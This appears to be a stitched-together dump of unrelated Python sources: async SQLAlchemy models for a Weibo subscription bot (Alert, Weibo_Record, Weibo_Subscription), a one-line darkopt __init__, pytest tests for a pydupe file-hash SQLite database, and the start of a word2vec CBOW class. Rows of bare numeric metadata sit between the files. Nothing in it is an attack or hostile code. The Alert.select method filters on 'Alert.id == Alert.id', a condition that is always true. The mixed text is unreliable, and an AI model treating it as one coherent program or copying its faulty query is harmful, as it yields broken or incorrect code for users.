result = Result.ListResult(error=True, info=repr(e), result=[])
return result
class Alert(Base):
__tablename__ = "Alert"
id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
alert_id = Column(String(16), nullable=False, comment="id")
content = Column(BLOB, nullable=False, primary_key=False, comment="图片")
def __init__(self, alert_id: str, content: bytes):
self.alert_id = alert_id
self.content = content
async def insert(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session.add(self)
result = Result.IntResult(error=False, info="Insert_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def delete(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select()
if not result.error and isinstance(result.result, Alert):
await session.delete(result.result)
result = Result.IntResult(error=False, info="Delete_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Alert).where(Alert.id == Alert.id))
subscription = session_result.scalar_one()
result = Result.IntResult(error=False, info="Exist", result=subscription)
except NoResultFound:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select_all(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Alert).where(
Alert.alert_id == self.alert_id))
result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
except NoResultFound:
result = Result.ListResult(error=False, info="Select_No_Result", result=[])
except MultipleResultsFound:
result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
except Exception as e:
result = Result.ListResult(error=True, info=repr(e), result=[])
return result
class Weibo_Record(Base):
__tablename__ = "Weibo_Record"
id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
uid = Column(String(25), nullable=False, primary_key=False)
weibo_id = Column(String(25), nullable=False, primary_key=False)
content = Column(BLOB, nullable=False, primary_key=False)
time = Column(DATETIME, nullable=False, primary_key=False, default=datetime.now)
def __init__(self, uid: str):
self.uid = uid
async def insert(self, weibo_id: str, content: bytes, time=datetime.now()):
self.weibo_id = weibo_id
self.content = content
self.time = time
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select(weibo_id)
if not result.error and result.result == 1:
session.add(self)
result = Result.IntResult(error=False, info="Insert_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select(self, weibo_id: str):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Weibo_Record).where(
Weibo_Record.weibo_id == weibo_id))
record = session_result.scalar_one()
result = Result.IntResult(error=False, info="Exist", result=record)
except NoResultFound:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select_last_weibo_id(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(func.max(Weibo_Record.weibo_id)).where(
Weibo_Record.uid == self.uid))
record = session_result.scalar_one()
if record:
result = Result.IntResult(error=False, info="Exist", result=record)
else:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except NoResultFound:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
class Weibo_Subscription(Base):
__tablename__ = "Weibo_Subscription"
id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
bot_id = Column(String(16), nullable=False, comment="Bot_id")
uid = Column(String(16), nullable=False, comment="微博UID")
subscriber_id = Column(String(16), nullable=False, comment="QQ/群号")
send_type = Column(String(10), nullable=False, comment="私聊/群")
def __init__(self, bot_id: str, uid: str, subscriber_id: str, send_type: str):
self.bot_id = bot_id
self.uid = uid
self.subscriber_id = subscriber_id
self.send_type = send_type
async def insert(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select()
if not result.error and result.result == 1:
session.add(self)
result = Result.IntResult(error=False, info="Insert_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def delete(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select()
if not result.error and isinstance(result.result, Weibo_Subscription):
await session.delete(result.result)
result = Result.IntResult(error=False, info="Delete_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Weibo_Subscription).where(
Weibo_Subscription.uid == self.uid).where(
Weibo_Subscription.subscriber_id == self.subscriber_id))
subscription = session_result.scalar_one()
result = Result.IntResult(error=False, info="Exist", result=subscription)
except NoResultFound:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select_subscribers(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Weibo_Subscription).where(
Weibo_Subscription.uid == self.uid))
result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
except NoResultFound:
result = Result.ListResult(error=False, info="Select_No_Result", result=[])
except MultipleResultsFound:
result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
except Exception as e:
result = Result.ListResult(error=True, info=repr(e), result=[])
return result
async def select_uids(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(distinct(Weibo_Subscription.uid)))
result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
except NoResultFound:
result = Result.ListResult(error=False, info="Select_No_Result", result=[])
except MultipleResultsFound:
result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
except Exception as e:
result = Result.ListResult(error=True, info=repr(e), result=[])
return result
| 49.326988
| 116
| 0.573543
| 4,584
| 44,049
| 5.363656
| 0.040794
| 0.103469
| 0.093952
| 0.116322
| 0.916013
| 0.914345
| 0.9104
| 0.905763
| 0.89889
| 0.89889
| 0
| 0.005765
| 0.330564
| 44,049
| 892
| 117
| 49.382287
| 0.828032
| 0.003383
| 0
| 0.84901
| 0
| 0
| 0.045521
| 0.021325
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013614
| false
| 0
| 0.012376
| 0.001238
| 0.149752
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4225d0e5cb735bfbe5bad23ad24224dd047f552
| 119
|
py
|
Python
|
darkopt/optimize/__init__.py
|
iwiwi/darkopt
|
071ecaa422441909d7f077b8097320bb304178d4
|
[
"MIT"
] | 2
|
2018-08-02T04:52:53.000Z
|
2019-09-11T10:02:24.000Z
|
darkopt/optimize/__init__.py
|
iwiwi/darkopt
|
071ecaa422441909d7f077b8097320bb304178d4
|
[
"MIT"
] | null | null | null |
darkopt/optimize/__init__.py
|
iwiwi/darkopt
|
071ecaa422441909d7f077b8097320bb304178d4
|
[
"MIT"
] | 1
|
2019-02-12T05:57:17.000Z
|
2019-02-12T05:57:17.000Z
|
from darkopt.optimize.optimizer import Optimizer # NOQA
from darkopt.optimize.trial_result import TrialResult # NOQA
| 39.666667
| 61
| 0.831933
| 15
| 119
| 6.533333
| 0.6
| 0.22449
| 0.387755
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 119
| 2
| 62
| 59.5
| 0.933333
| 0.07563
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a4580444880f100c51d1ed1435d4b78ea5e0caf9
| 20,224
|
py
|
Python
|
src/tests/test_database.py
|
chris2013/pydupe
|
be8fd2dd2a905899e376be4e0b3d2fc8482e89e6
|
[
"MIT"
] | null | null | null |
src/tests/test_database.py
|
chris2013/pydupe
|
be8fd2dd2a905899e376be4e0b3d2fc8482e89e6
|
[
"MIT"
] | 3
|
2022-01-28T15:54:54.000Z
|
2022-01-28T15:58:23.000Z
|
src/tests/test_database.py
|
chris2013/pydupe
|
be8fd2dd2a905899e376be4e0b3d2fc8482e89e6
|
[
"MIT"
] | null | null | null |
import os
import tempfile
import pytest
from pydupe.data import fparms
from pydupe.db import PydupeDB
import pathlib as pl
import typing as tp
@pytest.fixture
def setup_database() -> tp.Generator[None,None,None]:
""" Fixture to se-t up PydupeDB in tmporary Directory"""
with tempfile.TemporaryDirectory() as newpath:
old_cwd = os.getcwd()
os.chdir(newpath)
dbname = pl.Path.cwd() / ".dbtest.sqlite"
data = [fparms(filename='/tests/tdata/file_exists',
hash='be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
size=1,
inode=25303464,
mtime=1629356592,
ctime=1630424506),
fparms(filename='/tests/tdata/somedir/file_is_dupe',
hash='be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
size=1,
inode=25303464,
mtime=1629356592,
ctime=1630424506),
fparms(filename='/tests/tdata/somedir/dupe_in_dir',
hash='3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
size=1,
inode=25303464,
mtime=1629356592,
ctime=1630424506),
fparms(filename='/tests/tdata/somedir/dupe2_in_dir',
hash='3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
size=1,
inode=25303464,
mtime=1629356592,
ctime=1630424506)]
with PydupeDB(dbname) as db:
db.parms_insert(data)
db.commit()
yield
os.chdir(old_cwd)
@pytest.mark.usefixtures("setup_database")
class TestDatabase:
def test_insert_get(self) -> None:
"""check data inserted in fixture 'setup_database' works."""
dbname = pl.Path.cwd() / ".dbtest.sqlite"
with PydupeDB(dbname) as db:
data_get = db.get().fetchall()
data_dict = [dict(row) for row in data_get]
assert data_dict == [
{'filename': '/tests/tdata/file_exists',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506}]
def test_update_hash(self) -> None:
"""check hash update works."""
dbname = pl.Path.cwd() / ".dbtest.sqlite"
with PydupeDB(dbname) as db:
data_get = db.get().fetchall()
data_dict = [dict(row) for row in data_get]
# before:
assert data_dict == [
{'filename': '/tests/tdata/file_exists',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506}]
# update hash:
with PydupeDB(dbname) as db:
filename = '/tests/tdata/somedir/dupe2_in_dir'
hash = '3aa2ed13ee40ba651e87a0fd60bbbbbb3aa2ed13ee40ba651e87a0fd60bbbbbb'
db.update_hash([(hash, filename)])
db.commit()
# after:
with PydupeDB(dbname) as db:
data_get = db.get().fetchall()
data_dict = [dict(row) for row in data_get]
assert data_dict == [
{'filename': '/tests/tdata/file_exists',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60bbbbbb3aa2ed13ee40ba651e87a0fd60bbbbbb',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506}]
def test_rollback(self) -> None:
"""check autorolback after e.g. hash update works."""
dbname = pl.Path.cwd() / ".dbtest.sqlite"
with PydupeDB(dbname) as db:
data_get = db.get().fetchall()
data_dict = [dict(row) for row in data_get]
# before:
assert data_dict == [
{'filename': '/tests/tdata/file_exists',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506}]
# update hash:
with PydupeDB(dbname) as db:
filename = '/tests/tdata/somedir/dupe2_in_dir'
hash = '3aa2ed13ee40ba651e87a0fd60bbbbbb3aa2ed13ee40ba651e87a0fd60bbbbbb'
db.update_hash([(hash, filename)])
# no commit -> auto rollback by context manager
with PydupeDB(dbname) as db:
data_get = db.get().fetchall()
data_dict = [dict(row) for row in data_get]
assert data_dict == [
{'filename': '/tests/tdata/file_exists',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506}]
def test_get_list_of_files_where_hash_is_NULL(self) -> None:
dbname = pl.Path.cwd() / ".dbtest.sqlite"
data = [fparms(
filename='/tests/tdata/file_exists',
hash=None,
size=1,
inode=25303464,
mtime=1629356592,
ctime=1630424506)]
with PydupeDB(dbname) as db:
db.execute(
"DELETE from lookup WHERE hash = 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6'")
db.parms_insert(data)
db.commit()
data_get = db.get_list_of_equal_sized_files_where_hash_is_NULL()
assert data_get == [
'/tests/tdata/file_exists']
def test_get_list_of_files_in_dir(self) -> None:
dbname = pl.Path.cwd() / ".dbtest.sqlite"
with PydupeDB(dbname) as db:
data_get = db.get_list_of_files_in_dir(
'/tests/tdata/somedir')
assert data_get == ['/tests/tdata/somedir/dupe2_in_dir',
'/tests/tdata/somedir/dupe_in_dir',
'/tests/tdata/somedir/file_is_dupe'
]
def test_get_file_hash(self) -> None:
dbname = pl.Path.cwd() / ".dbtest.sqlite"
with PydupeDB(dbname) as db:
data_get = db.get_file_hash()
data_dict = [dict(row) for row in data_get]
assert data_dict == [
{'filename': '/tests/tdata/file_exists',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6'},
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6'},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0'},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0'}
]
def test_delete_dir(self) -> None:
dbname = pl.Path.cwd() / ".dbtest.sqlite"
with PydupeDB(dbname) as db:
db.delete_dir(pl.Path('/tests/tdata/somedir'))
data_get = db.get().fetchall()
data_dict = [dict(row) for row in data_get]
assert data_dict == [
{'filename': '/tests/tdata/file_exists',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506}]
def test_delete_file(self) -> None:
dbname = pl.Path.cwd() / ".dbtest.sqlite"
with PydupeDB(dbname) as db:
db.delete_file(filename=pl.Path('/tests/tdata/file_exists'))
data_get = db.get_file_hash().fetchall()
data_dict = [dict(row) for row in data_get]
assert data_dict == [
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6'},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0'},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0'}
]
def test_copy_dir_to_table_permanent(self) -> None:
"""check data inserted in fixture 'setup_database' works."""
dbname = pl.Path.cwd() / ".dbtest.sqlite"
with PydupeDB(dbname) as db:
db.copy_dir_to_table_permanent(
pl.Path('/tests/tdata/somedir'))
db.commit()
data_get_lookup = db.execute('SELECT * FROM lookup').fetchall()
data_get_permanent = db.execute('SELECT * FROM permanent').fetchall()
data_dict_lookup = [dict(row) for row in data_get_lookup]
data_dict_permanent = [dict(row) for row in data_get_permanent]
assert data_dict_lookup == [
{'filename': '/tests/tdata/file_exists',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506}]
assert data_dict_permanent == [
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506}]
def test_copy_hash_to_table_lookup_and_clear_permanent(self) -> None:
"""check data inserted in fixture 'setup_database' works."""
dbname = pl.Path.cwd() / ".dbtest.sqlite"
with PydupeDB(dbname) as db:
db.execute("INSERT INTO permanent SELECT * FROM lookup WHERE filename like '/tests/tdata/somedir%'")
db.update_hash([(None, '/tests/tdata/file_exists')])
db.update_hash([(None, '/tests/tdata/somedir/file_is_dupe')])
db.commit()
data_get_lookup = db.execute('SELECT * FROM lookup').fetchall()
data_get_permanent = db.execute('SELECT * FROM permanent').fetchall()
data_dict_lookup = [dict(row) for row in data_get_lookup]
data_dict_permanent = [dict(row) for row in data_get_permanent]
assert data_dict_lookup == [
{'filename': '/tests/tdata/file_exists',
'hash': None,
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': None,
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506}]
assert data_dict_permanent == [
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506}]
with PydupeDB(dbname) as db:
db.copy_hash_to_table_lookup(check_filename=True)
db.commit()
data_get_lookup = db.execute('SELECT * FROM lookup').fetchall()
data_get_permanent = db.execute('SELECT * FROM permanent').fetchall()
data_dict_lookup = [dict(row) for row in data_get_lookup]
data_dict_permanent = [dict(row) for row in data_get_permanent]
assert data_dict_lookup == [
{'filename': '/tests/tdata/file_exists',
'hash': None,
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506}]
assert data_dict_permanent == [
{'filename': '/tests/tdata/somedir/file_is_dupe',
'hash': 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506},
{'filename': '/tests/tdata/somedir/dupe2_in_dir',
'hash': '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
'size': 1,
'inode': 25303464,
'mtime': 1629356592,
'ctime': 1630424506}]
| 42.487395
| 117
| 0.571648
| 1,649
| 20,224
| 6.843542
| 0.067314
| 0.059371
| 0.089322
| 0.074967
| 0.932388
| 0.914222
| 0.887993
| 0.886043
| 0.885335
| 0.879663
| 0
| 0.244186
| 0.311116
| 20,224
| 475
| 118
| 42.576842
| 0.56582
| 0.018938
| 0
| 0.866511
| 0
| 0
| 0.362755
| 0.269945
| 0
| 0
| 0
| 0
| 0.037471
| 1
| 0.025761
| false
| 0
| 0.016393
| 0
| 0.044496
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f17b39bd411ab6e9d97543967fdaddd5fecacc2d
| 20,041
|
py
|
Python
|
word2vec.py
|
houshengyuan/Word2vec
|
8861dce1e9f7043f366ad94146a535d726f72d7c
|
[
"MIT"
] | null | null | null |
word2vec.py
|
houshengyuan/Word2vec
|
8861dce1e9f7043f366ad94146a535d726f72d7c
|
[
"MIT"
] | null | null | null |
word2vec.py
|
houshengyuan/Word2vec
|
8861dce1e9f7043f366ad94146a535d726f72d7c
|
[
"MIT"
] | null | null | null |
import os
import pickle
import time
from os.path import join
from typing import List
import numpy as np
from utils.dataset import Dataset
from utils.vocab import Vocab
from utils.hierarchical_softmax import Huffman_tree
from utils.negative_sampling import NEG
def one_hot(dim: int, idx: int):
""" Get one-hot vector """
v = np.zeros(dim)
v[idx] = 1
return v
def softmax(x, dim: [int]=-1):
e_x = np.exp(x - np.max(x, dim))
return e_x / np.sum(e_x, dim)
def sigmoid(x):
mask = (x>0)
pos = (x+np.fabs(x))/2
neg = (x-np.fabs(x))/2
return mask*(1/(1+np.exp(-pos)))+(1-mask)*(np.exp(neg)/(1+np.exp(neg)))
class CBOW:
def __init__(self, vocab: Vocab, vector_dim: int,
hierarchical_softmax: bool=False, negative_sampling: bool=False,
size: int=10, subsampling: bool=False, subsample_thr: float=1e-3):
self.vocab = vocab
self.vector_dim = vector_dim
self.hierarchical_softmax = hierarchical_softmax
self.negative_sampling = negative_sampling
self.subsampling = subsampling
self.subsample_thr = subsample_thr
os.makedirs("log", exist_ok=True)
self.log = open("log/cbow" + ("_hierarchical" if self.hierarchical_softmax else "") + ("_neg" if self.negative_sampling else "")
+ ("_sub" if self.subsampling else "") + ".txt", "a+")
